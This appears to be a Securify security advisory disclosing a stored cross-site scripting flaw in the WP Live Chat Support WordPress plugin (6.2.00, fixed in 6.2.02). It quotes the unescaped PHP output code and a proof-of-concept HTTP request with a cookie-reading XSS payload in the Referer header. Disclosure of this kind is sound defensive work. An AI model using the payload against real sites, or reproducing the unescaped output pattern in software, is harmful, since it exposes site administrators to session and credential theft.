For feedback or questions about this advisory mail us at sumofpwn at securify.nl
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
This issue was successfully tested on WP Live Chat Support WordPress plugin version 6.2.00.
This issue has been fixed in version 6.2.02 of the WP Live Chat Support plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/wp-live-chat-support.zip.
WP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user.
'status' => '5',
'timestamp' => current_time('mysql'),
'name' => $name,
'email' => $email,
'session' => $session,
'ip' => maybe_serialize($user_data),
'url' => $_SERVER['HTTP_REFERER'],
'last_active_timestamp' => current_time('mysql'),
'other' => maybe_serialize($other),
The PHP code of the vulnerable output (HTML and JS context) is as follows:
echo " <span class='part1'>" . __("Chat initiated on:", "wplivechat") . "</span> <span class='part2'>" . $result->url . "</span>";
The PHP code for the page is as follows:
</span> <a href='"+v_browsing_url+"' target='_BLANK'>"+v_browsing+"</a><br /><span class='wplc-sub-item-header'>Email:</span> <a href='mailto:"+v_email+"' target='_BLANK'>"+v_email+"</a></span>";
The malicious code supplied by an attacker can be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Stored Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users. The victim (potentially even WP-admin) only has to view the wplivechat-menu page which generally is the first page when the plugin is opened.
This vulnerability can be demonstrated by intercepting the wplc_start_chat action after filling in your name and e-mail and then changing the Referer header relative path to the Cross-Site Scripting payload.
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.28.129/'"><img src=x onerror=alert(document.cookie)>/
Accept-Encoding: gzip, deflate
Cookie: wplc_cid=1742; wplc_name=Guest; wplc_email=no%20email%20set; wplc_chat_status=5; iflychat_guest_id=1467535930we14g; iflychat_guest_session=320f0212654acf6216884952f5766c7b; iflychat_guest_name=Guest%20Norene; iflychat_key=undefined; iflychat_css=undefined; iflychat_time=1467535929896; wplc_hide=